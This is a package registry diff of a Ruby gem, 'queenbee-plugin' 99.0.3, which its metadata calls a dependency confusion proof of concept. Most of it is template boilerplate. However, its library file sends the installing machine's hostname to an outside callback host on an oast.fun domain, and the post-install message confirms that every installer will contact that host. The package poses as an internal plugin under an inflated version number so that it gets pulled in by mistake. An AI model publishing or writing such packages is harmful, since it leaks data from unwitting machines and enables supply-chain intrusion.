queenbee-plugin 99.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of queenbee-plugin might be problematic. Click here for more details.

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: bdf8376045c6b78a1b5db7788041ccf1c6212886b19fb4325346186371fb8034
4
+ data.tar.gz: dbbb8d41d88e265f40f4413a7f3dec377c65aac89339160a01c743116b3a3c14
5
+ SHA512:
6
+ metadata.gz: 170a0fbdc9abcef4c7bcf895457a01d73e7f9048859b16999398835a6560f0e72b00c3e487826224e189a547c61bafe7297b5de2f1e6b79c4922babd98c07e39
7
+ data.tar.gz: 522d3616a4d756804d597b25ad632f0e66946e3988b5b99845c7af58491362e6c4bec4c82e88adc680002769309cc19d87ecaa2ac64795eae41c7807da97f3b4
data/README.md ADDED
@@ -0,0 +1,35 @@
1
+ # Queenbee::Plugin
2
+
3
+ TODO: Delete this and the text below, and describe your gem
4
+
5
+ Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/queenbee/plugin`. To experiment with that code, run `bin/console` for an interactive prompt.
6
+
7
+ ## Installation
8
+
9
+ TODO: Replace `UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG` with your gem name right after releasing it to RubyGems.org. Please do not do it earlier due to security reasons. Alternatively, replace this section with instructions to install your gem from git if you don't plan to release to RubyGems.org.
10
+
11
+ Install the gem and add to the application's Gemfile by executing:
12
+
13
+ ```bash
14
+ bundle add UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG
15
+ ```
16
+
17
+ If bundler is not being used to manage dependencies, install the gem by executing:
18
+
19
+ ```bash
20
+ gem install UPDATE_WITH_YOUR_GEM_NAME_IMMEDIATELY_AFTER_RELEASE_TO_RUBYGEMS_ORG
21
+ ```
22
+
23
+ ## Usage
24
+
25
+ TODO: Write usage instructions here
26
+
27
+ ## Development
28
+
29
+ After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
30
+
31
+ To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and the created tag, and push the `.gem` file to [rubygems.org](https://rubygems.org).
32
+
33
+ ## Contributing
34
+
35
+ Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/queenbee-plugin.
data/Rakefile ADDED
@@ -0,0 +1,4 @@
1
+ # frozen_string_literal: true
2
+
3
+ require "bundler/gem_tasks"
4
+ task default: %i[]
@@ -0,0 +1,7 @@
1
+ # frozen_string_literal: true
2
+
3
+ module Queenbee
4
+ module Plugin
5
+ VERSION = "99.0.3"
6
+ end
7
+ end
@@ -0,0 +1,6 @@
1
+ # الكود الحالي لإرسال request
2
+ require 'net/http'
3
+ require 'uri'
4
+
5
+ uri = URI("https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun/poc?host=#{`hostname`.strip}")
6
+ Net::HTTP.get(uri)
@@ -0,0 +1,6 @@
1
+ module Queenbee
2
+ module Plugin
3
+ VERSION: String
4
+ # See the writing guide of rbs: https://github.com/ruby/rbs#guides
5
+ end
6
+ end
metadata ADDED
@@ -0,0 +1,52 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: queenbee-plugin
3
+ version: !ruby/object:Gem::Version
4
+ version: 99.0.3
5
+ platform: ruby
6
+ authors:
7
+ - Osama
8
+ autorequire:
9
+ bindir: exe
10
+ cert_chain: []
11
+ date: 2026-03-26 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: This gem is a PoC for testing Dependency Confusion attacks on queenbee-plugin.
14
+ email:
15
+ - hackeroneosama@gmail.com
16
+ executables: []
17
+ extensions: []
18
+ extra_rdoc_files: []
19
+ files:
20
+ - README.md
21
+ - Rakefile
22
+ - lib/queenbee/plugin.rb
23
+ - lib/queenbee/plugin/version.rb
24
+ - sig/queenbee/plugin.rbs
25
+ homepage: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
26
+ licenses:
27
+ - MIT
28
+ metadata:
29
+ allowed_push_host: https://rubygems.org
30
+ homepage_uri: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
31
+ source_code_uri: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
32
+ changelog_uri: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun
33
+ post_install_message: 'PoC gem installed! Any machine installing this will hit: https://fcawsppvatnxzeiimvutzix8h5f7luui1.oast.fun'
34
+ rdoc_options: []
35
+ require_paths:
36
+ - lib
37
+ required_ruby_version: !ruby/object:Gem::Requirement
38
+ requirements:
39
+ - - ">="
40
+ - !ruby/object:Gem::Version
41
+ version: 3.0.0
42
+ required_rubygems_version: !ruby/object:Gem::Requirement
43
+ requirements:
44
+ - - ">="
45
+ - !ruby/object:Gem::Version
46
+ version: '0'
47
+ requirements: []
48
+ rubygems_version: 3.3.5
49
+ signing_key:
50
+ specification_version: 4
51
+ summary: Proof of Concept gem for Dependency Confusion testing
52
+ test_files: []